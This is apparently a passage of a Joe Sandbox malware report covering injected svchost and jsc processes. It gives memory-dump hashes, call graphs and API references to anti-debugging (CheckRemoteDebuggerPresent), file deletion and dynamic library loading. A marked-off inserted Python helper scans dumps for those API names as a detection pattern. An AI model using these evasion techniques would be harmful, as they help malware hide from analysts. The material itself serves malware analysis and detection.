                                                                          • Opcode ID: 7170b1d589fb1e4cd46d72328f8bea376acddda3d1aec330fccaeb790c5df911
                                                                          • Instruction ID: 71d2dbf544d9073cd60d6865cdffe9edb1fcc2a57ba2bcc038dad54b98bd3e12
                                                                          • Opcode Fuzzy Hash: 7170b1d589fb1e4cd46d72328f8bea376acddda3d1aec330fccaeb790c5df911
                                                                          • Instruction Fuzzy Hash: 1C418F34A0875C8FDB54DFA8C889BEDBBF0FB1A311F1041AAD049D7252DB74A945CB41
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8b0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 1c33fe11f24b4fb623ea540b2fc1b5c9f33731fc83a00bc69aeb2da1f8d65f2a
                                                                          • Instruction ID: f3b48265a86cabe9f69aa6646b10775eeab2eb5e659d0d33d51326bb497cab17
                                                                          • Opcode Fuzzy Hash: 1c33fe11f24b4fb623ea540b2fc1b5c9f33731fc83a00bc69aeb2da1f8d65f2a
                                                                          • Instruction Fuzzy Hash: 98316A74A0871C8FEB58DF98D889BEDB7F0FB19311F10416AD00AE7252DB74A985CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1994756231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b980000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c52539776d8b442befabffb6a0a64bea705806fd3d472709a182f97f113de3e7
                                                                          • Instruction ID: d7c684026ab31ac09c6f4bfc3c4b4373ef6a4af03c544a09204cef0e187610bd
                                                                          • Opcode Fuzzy Hash: c52539776d8b442befabffb6a0a64bea705806fd3d472709a182f97f113de3e7
                                                                          • Instruction Fuzzy Hash: 89522972A1EBD95FD766DB7888655A47FE0EF5A304B0A01FFC0C9CB0A3D9286906C341
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 68852acea4e701cd98b34177a04175d4d545677da7927219cdc54a751d3d4974
                                                                          • Instruction ID: 354eea64a6f4c400bdb3e6fd8be81a0c410ebca66a61a01a13872474cdcf648b
                                                                          • Opcode Fuzzy Hash: 68852acea4e701cd98b34177a04175d4d545677da7927219cdc54a751d3d4974
                                                                          • Instruction Fuzzy Hash: 1C32E77070EA498FD7A9EF68D4A567977E1FF59300B0500BEE48AC71E2DE24ED418741
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e7552a45636fa7a0983f3debf1b7e066e1e7f36d561d286ed11b03db973f7a2
                                                                          • Instruction ID: cfd12a68687ddc9591591944c7aaa6c12b16c4b9ac743bf81b6ff51671e1e828
                                                                          • Opcode Fuzzy Hash: 6e7552a45636fa7a0983f3debf1b7e066e1e7f36d561d286ed11b03db973f7a2
                                                                          • Instruction Fuzzy Hash: B7027A7072D78A4FD329DB2884914B6B7E2FFC9305B14867EE4C6C72A5DA34E906C781
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e5baaf1c06b520f2d44fcfa4c9922e6c067654c215c32356def5f6f57049d670
                                                                          • Instruction ID: 5f09913e24de2b60d467817d957ca6f717109260faff80454042b832836e6775
                                                                          • Opcode Fuzzy Hash: e5baaf1c06b520f2d44fcfa4c9922e6c067654c215c32356def5f6f57049d670
                                                                          • Instruction Fuzzy Hash: 77E12C71B0E98D4FE7A4FB6C88A56B97BE1FF5D300F4501FAD04DC75A2DA2868068741
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a318300c669d6b07264f0a77141e9297064b558f0479d4b5f449442212434549
                                                                          • Instruction ID: 5bacf29bb81806bc640be3ee9b0980811dc73cdbe801ed07df2f1e0414e5956b
                                                                          • Opcode Fuzzy Hash: a318300c669d6b07264f0a77141e9297064b558f0479d4b5f449442212434549
                                                                          • Instruction Fuzzy Hash: 8A718C3170DB9A4FE769CB6CC4A50A5B7D2FFC9300B05467EE0C9C72B5D924A9028F81
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5e40f9d455ee50f4c5a96f5e2205f8bd3f551c0952ce99b3af70b5cd52b5d5e
                                                                          • Instruction ID: 797467078eb342e7bfdbc62dc2cfcfdc8fe464a51ecefa84a17a31fdce31588f
                                                                          • Opcode Fuzzy Hash: b5e40f9d455ee50f4c5a96f5e2205f8bd3f551c0952ce99b3af70b5cd52b5d5e
                                                                          • Instruction Fuzzy Hash: D3712471B0DD8D4FDB58EB6C9465AB87BE1EF99300F0901AFD04DC71A6DE24AC428740
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab4c9c4d4fbe1bd3e738e269c8a3d4f463f9ecbc132fadee34351841c7c29c35
                                                                          • Instruction ID: b7b9bc84a408add3aaa881283df1894ee127f539332ca3846292039a0ee7c5f9
                                                                          • Opcode Fuzzy Hash: ab4c9c4d4fbe1bd3e738e269c8a3d4f463f9ecbc132fadee34351841c7c29c35
                                                                          • Instruction Fuzzy Hash: 40714AB1A1E68E4FE3B5AFA8843257577D0EF59310B0601FBC44AC71E3EE18AD068741
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1994756231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b980000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 577979f8856d3ae51d4400883fae920a844f7de1bb882e92809cd73de5c4028e
                                                                          • Instruction ID: 004fa59a6abb51c8cab97d41ee717b84b4b6399c40978aab7bac9bacab974216
                                                                          • Opcode Fuzzy Hash: 577979f8856d3ae51d4400883fae920a844f7de1bb882e92809cd73de5c4028e
                                                                          • Instruction Fuzzy Hash: 53611A3161EADD4FDB66DB7488759A57BF1EF1A30470A01EBC08AC71A7D928A906C341
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf8fb698c39d4a78735560afbacbab076eeb7530c73f0a2e2c68f562fc37d03f
                                                                          • Instruction ID: 241820b09f32516374c04d00479680b0e000f0fd5643ba2b9538eed649e77319
                                                                          • Opcode Fuzzy Hash: bf8fb698c39d4a78735560afbacbab076eeb7530c73f0a2e2c68f562fc37d03f
                                                                          • Instruction Fuzzy Hash: F551E770A0AA8D8FDB55EF68C465AED7FF0FF5A310B0901AFD049D71B2CA25A941C781
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0ea0e3c17fa9db783f54fee4199665e954b6a16873685f1d5817a6a9bff1dbcb
                                                                          • Instruction ID: 986cf4e1f2bbab3f4b81d89143d5045d0e773ae8ba10df27d7ee09a408003cb6
                                                                          • Opcode Fuzzy Hash: 0ea0e3c17fa9db783f54fee4199665e954b6a16873685f1d5817a6a9bff1dbcb
                                                                          • Instruction Fuzzy Hash: 8F51C771E19A8D4FEB54FBA888A5BECBBE1FF59300F4401BAD049D7196DE3458828B41
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 10db249f9e9afdc1d9333cb302c64a6ce0230eb3791726056777138bcd493bdf
                                                                          • Instruction ID: ad7cd0671d0ea9fba91d03126029ca22f82b7120d400c38b4d40eabe4f2f6edc
                                                                          • Opcode Fuzzy Hash: 10db249f9e9afdc1d9333cb302c64a6ce0230eb3791726056777138bcd493bdf
                                                                          • Instruction Fuzzy Hash: CE5127B161E74D8FD7A5EFA884616B577D0EF59310F0501BED48AC71E2DE28ED068780
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2d00f9c06d74c5ff1e8e9933ca8cb4409f1144acfff634c78740a071cf1d1550
                                                                          • Instruction ID: 1f7446d4f264455ab43f13b2e6168f90d8f65b4c59a19e5828b62cd6e034a4cb
                                                                          • Opcode Fuzzy Hash: 2d00f9c06d74c5ff1e8e9933ca8cb4409f1144acfff634c78740a071cf1d1550
                                                                          • Instruction Fuzzy Hash: 524166B260E7890FD71E9B2488210B67B90EB53320B1682BFD487C75A7EC186D438392
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 649cc15107170fd4b689a58edde15af68fe52d69cf85e2c4f0cdb99a989dc11a
                                                                          • Instruction ID: 718ab1c8c997667a45bf4ee2e8856ad3e30c4b48726ae9519ade18680be5cdbb
                                                                          • Opcode Fuzzy Hash: 649cc15107170fd4b689a58edde15af68fe52d69cf85e2c4f0cdb99a989dc11a
                                                                          • Instruction Fuzzy Hash: 5B412952B0EA890FF399A6AC08B57B47BD2EF9A250F0502FBD049C72D7DC1C2C064381
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c19be804db6f871e0fae2bd32a2476f84e249578f04c63a3a5f5bd219f9a599c
                                                                          • Instruction ID: ec6912bc75cb9b6f9f6f210f6e8c84f2dfa5b36a8480e392c6ae75f9cac65009
                                                                          • Opcode Fuzzy Hash: c19be804db6f871e0fae2bd32a2476f84e249578f04c63a3a5f5bd219f9a599c
                                                                          • Instruction Fuzzy Hash: 4641F23060D76C4FD3ACDB6CC06147A77E1EF8AA51B51077EE4DB83692DA25E9028B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8c43253abd193abcef34635ff68036a6d858f13dcbfd68622f1da15edfdf767f
                                                                          • Instruction ID: 95423f56049071f11537255ca47879a6c76331fe6557a72b454dda541c3b5df5
                                                                          • Opcode Fuzzy Hash: 8c43253abd193abcef34635ff68036a6d858f13dcbfd68622f1da15edfdf767f
                                                                          • Instruction Fuzzy Hash: E231C531709A1D4FDBA8DB2C946167873D2EF98701F1501BEE04EC3696DE24AD468BC5
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 86d9a7ae5f3f6a148ea76b3926d8ab488f45254a01b9b1b9f6e8ded86196551c
                                                                          • Instruction ID: 50faf80b5558ca5fe076c727929ee31c7fa52af305e13720af39fcc6913fa4d2
                                                                          • Opcode Fuzzy Hash: 86d9a7ae5f3f6a148ea76b3926d8ab488f45254a01b9b1b9f6e8ded86196551c
                                                                          • Instruction Fuzzy Hash: DE41BCA1A1E3C64FE31B977488714643FB0AF5721471A44FFC0C6CB1F7D918A90A8762
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44efebef162fa06e581b91cea294f7166051251f10ebb37803f25d7139036b2d
                                                                          • Instruction ID: 9cdc8c5d66af93f725737f85132fc79160b6d5732859978b3b7be28239dba4ff
                                                                          • Opcode Fuzzy Hash: 44efebef162fa06e581b91cea294f7166051251f10ebb37803f25d7139036b2d
                                                                          • Instruction Fuzzy Hash: C231E16160E7C60FD317A77898705A0BFA2AF97310B1A41FBC095CB5E7D828694AC352
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5eb504b910f1e1725300241261c12921e8f66172220237441bfe506c3e8a620c
                                                                          • Instruction ID: aa8bad021ea552b915ab69be376c254b22d754c42d0824ded41bbc0c04d3aad2
                                                                          • Opcode Fuzzy Hash: 5eb504b910f1e1725300241261c12921e8f66172220237441bfe506c3e8a620c
                                                                          • Instruction Fuzzy Hash: 89212921B0EA5D1FE798EBBD6CA977463C1EFAC211B0942BBA04DC72E6DC145C424781
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 42f1018ccafcb3dcb4f70a1bf9790f8f6541285a01352fd66a3e2e2dbfc07508
                                                                          • Instruction ID: 22cc141f57deae69ced0afaffeaf44e5a9944b9967b3237eed04b678641ac2f8
                                                                          • Opcode Fuzzy Hash: 42f1018ccafcb3dcb4f70a1bf9790f8f6541285a01352fd66a3e2e2dbfc07508
                                                                          • Instruction Fuzzy Hash: AF319EA290E3C14FE3179B7488614A53FB1AF57214B1E84EBC0C6CF4B7D518A90AD722
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.1993715405.00007FFD9B8BC000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BC000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_7ffd9b8bc000_svchost.jbxd

                                                                          Execution Graph

                                                                          Execution Coverage: 11.5%
                                                                          Dynamic/Decrypted Code Coverage: 54.5%
                                                                          Signature Coverage: 0%
                                                                          Total number of Nodes: 11
                                                                          Total number of Limit Nodes: 1
                                                                          execution_graph (rendered graph; the three call chains it contains, by address):
                                                                          • 6f0fde2 -> 6f0fc71 -> 6f0fe0b, and 6f0fc71 -> 6f0fe78 (LoadLibraryExW) -> 6f0fea9
                                                                          • 10cb650 -> 10cb696 (DeleteFileW) -> 10cb6cf
                                                                          • 10c7ee0 -> 10c7f24 (CheckRemoteDebuggerPresent) -> 10c7f66

                                                                          Control-flow Graph

                                                                          control_flow_graph (rendered graph, blocks marked Executed / Not Executed) for the function starting at block 6f0f7d8-6f0f7f8; notable blocks: 6f0fcb5-6f0fce4 (call 6f09bf8) and 6f0fe78-6f0fea7 (LoadLibraryExW). The full basic-block edge list is omitted here.
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2937670409.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_6f00000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 04e6b3abe11518dea5549a2c1c62c256f86f64e515810bb6c14fc44743600590
                                                                          • Instruction ID: 76c804c783d637f130110ace8244e72c979b37dddba58c745819cbc6ca1b08c4
                                                                          • Opcode Fuzzy Hash: 04e6b3abe11518dea5549a2c1c62c256f86f64e515810bb6c14fc44743600590
                                                                          • Instruction Fuzzy Hash: 57129E74E012099FEB60DF68D890BAEB7B6FB88310F108525D809E7395DB34EC46DB91

                                                                          Control-flow Graph
                                                                          • Function at 10c7ee0-10c7fa8: calls CheckRemoteDebuggerPresent in the entry block (10c7ee0-10c7f64), then either passes through a short block (10c7f66-10c7f6c) or goes straight to the exit block (10c7f6d-10c7fa8) (edge list omitted)
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 010C7F57
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2875980880.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_10c0000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 22db2db4ad685bc795baf6a6411d552136781d669db18b827ed3204ee6f15861
                                                                          • Instruction ID: 2d04745ef0ebc853e31b9b2435c993e7fcb9c80e116ff51af2e32661aa1e66d2
                                                                          • Opcode Fuzzy Hash: 22db2db4ad685bc795baf6a6411d552136781d669db18b827ed3204ee6f15861
                                                                          • Instruction Fuzzy Hash: CF2145B1800259CFCB14CF9AD884BEEFBF4AF48320F14846AE459A3250C738A944CFA0

                                                                          Control-flow Graph
                                                                          • Function at 10c7ed8-10c7fa8: calls CheckRemoteDebuggerPresent in the entry block (10c7ed8-10c7f64), then either passes through a short block (10c7f66-10c7f6c) or goes straight to the exit block (10c7f6d-10c7fa8) (edge list omitted)
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 010C7F57
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2875980880.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_10c0000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: b7cd86e12ed337625cd7f7c3c3b97e62bf158ce3a86a86a4dbab1c594511c761
                                                                          • Instruction ID: 3b8c53f97e0f925483603bcea87be0bbaa7a75b78fda685879138ec9cd1bc0e9
                                                                          • Opcode Fuzzy Hash: b7cd86e12ed337625cd7f7c3c3b97e62bf158ce3a86a86a4dbab1c594511c761
                                                                          • Instruction Fuzzy Hash: D82136B1C00259CFCB14CF9AD585BEEBBF4AF48310F14846AE459A3251C738A944CF64

                                                                          Control-flow Graph
                                                                          • Function at 10cb648-10cb6fe: entry block (10cb648-10cb69a) branches through an optional block (10cb69c-10cb69f) into the block that calls DeleteFileW (10cb6a2-10cb6cd), which then either passes through 10cb6cf-10cb6d5 or goes straight to the exit block (10cb6d6-10cb6fe) (edge list omitted)
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010CB6C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2875980880.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_10c0000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: b8573d93d4112f0d732462b03bba5bd146d54fba0b7e64e5bc9dbafbedfca558
                                                                          • Instruction ID: f7d248c776f56d5c428c5deb691c7a1b46c8d77678aebdf9464bdc1a50ff4478
                                                                          • Opcode Fuzzy Hash: b8573d93d4112f0d732462b03bba5bd146d54fba0b7e64e5bc9dbafbedfca558
                                                                          • Instruction Fuzzy Hash: 082124B1C006199FDB14CF9AD5457AEFBF4BF48320F14816AD858A7250D738A940CFA4
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010CB6C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2875980880.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_10c0000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: c1025525e7e1b34972bd0a59bc9e58ee3543143ff2020d91048e3f74bfb46f5c
                                                                          • Instruction ID: 7dbccdcd97389bc73370f3f76e79eb70f1fe25285757d7fb8fb6ca7c828049f9
                                                                          • Opcode Fuzzy Hash: c1025525e7e1b34972bd0a59bc9e58ee3543143ff2020d91048e3f74bfb46f5c
                                                                          • Instruction Fuzzy Hash: B81133B1C0061A9BCB14CF9AC545B9EFBF4BF48720F10816AD858A7250D738A940CFA5
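The entries above show the unpacked code referencing CheckRemoteDebuggerPresent (anti-debugging) and DeleteFileW (file removal), and the earlier graph shows a LoadLibraryExW call. The following is an added example, not part of the Joe Sandbox report or of the sample's code: a small Python triage helper that scans a raw memory dump for those API names in both ASCII and UTF-16LE (managed .NET payloads keep P/Invoke names as UTF-16 strings, native stubs keep them as ASCII) and groups the hits into the behaviours the report's signature list flags. The dump bytes, the `base` address and the API-to-behaviour mapping are constructed for the example and are assumptions, not data from the sample.

```python
"""Triage helper: locate Win32 API name references in a raw memory dump.

Added example, not code from the Joe Sandbox report or from the analysed
sample. It searches for API names in ASCII and UTF-16LE and maps each hit to
the behaviour an analyst would attribute to it.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Behaviour each API name suggests. This mapping is an assumption made for the
# example; it mirrors the kind of signature the report derives from API usage.
API_BEHAVIOUR: Dict[str, str] = {
    "CheckRemoteDebuggerPresent": "anti-debug (sandbox/debugger evasion)",
    "IsDebuggerPresent": "anti-debug (sandbox/debugger evasion)",
    "DeleteFileW": "file deletion (possible self-removal / cleanup)",
    "LoadLibraryExW": "dynamic library loading (reflective / late binding)",
}


@dataclass(frozen=True)
class Hit:
    api: str
    offset: int       # virtual address = dump base + offset inside the dump
    encoding: str     # "ascii" or "utf-16le"
    behaviour: str


def _patterns() -> List[Tuple[str, str, "re.Pattern[bytes]"]]:
    """Compile one bytes pattern per API name and encoding."""
    pats = []
    for name in API_BEHAVIOUR:
        pats.append((name, "ascii", re.compile(re.escape(name.encode("ascii")))))
        pats.append((name, "utf-16le", re.compile(re.escape(name.encode("utf-16le")))))
    return pats


def scan_dump(data: bytes, base: int = 0) -> List[Hit]:
    """Return every API-name reference in `data`, sorted by virtual address.

    `base` plays the role of the report's "Offset" field (the dump's load
    address), so the reported addresses line up with the disassembly view.
    """
    hits: List[Hit] = []
    for name, enc, pat in _patterns():
        for m in pat.finditer(data):
            hits.append(Hit(name, base + m.start(), enc, API_BEHAVIOUR[name]))
    return sorted(hits, key=lambda h: (h.offset, h.api))


def summarize(hits: List[Hit]) -> Dict[str, List[str]]:
    """Group hits by implied behaviour, similar to the report's signature list."""
    out: Dict[str, set] = {}
    for h in hits:
        out.setdefault(h.behaviour, set()).add(h.api)
    return {k: sorted(v) for k, v in out.items()}


# Constructed sample dump (not taken from the real sample): filler bytes, an
# ASCII import name as a native stub would hold it, and two UTF-16LE P/Invoke
# names as a .NET payload would hold them.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"kernel32.dll\x00"
    + b"CheckRemoteDebuggerPresent\x00"
    + b"\x90" * 8
    + "DeleteFileW".encode("utf-16le") + b"\x00\x00"
    + b"\xcc" * 4
    + "LoadLibraryExW".encode("utf-16le") + b"\x00\x00"
)

if __name__ == "__main__":
    # Assumed base address so the output resembles the report's "ref:" column.
    for h in scan_dump(SAMPLE_DUMP, base=0x010C0000):
        print(f"{h.offset:08X} {h.encoding:8s} {h.api:28s} {h.behaviour}")
    print(summarize(scan_dump(SAMPLE_DUMP)))
```

A string hit only proves the name is present in memory, not that the call is reached; the control-flow graphs above are what show CheckRemoteDebuggerPresent actually sitting in the entry block of a function. Use a scan like this to decide which dumps deserve that closer look.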
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2874671635.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_107d000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e01fa846f3f9a47e76cc320f98a42ff5c9d9e355e83df2fc6419c787f1c92d07
                                                                          • Instruction ID: e6c2f733cc07b3d481dce6555409a1fcdbef5eac33af9bd0302cc14aabd7210e
                                                                          • Opcode Fuzzy Hash: e01fa846f3f9a47e76cc320f98a42ff5c9d9e355e83df2fc6419c787f1c92d07
                                                                          • Instruction Fuzzy Hash: 0D213771904204EFCB12DF68D9C4B26BBA5FF84314F20C5ADE9894B252C737D446CBA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.2874671635.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_107d000_jsc.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
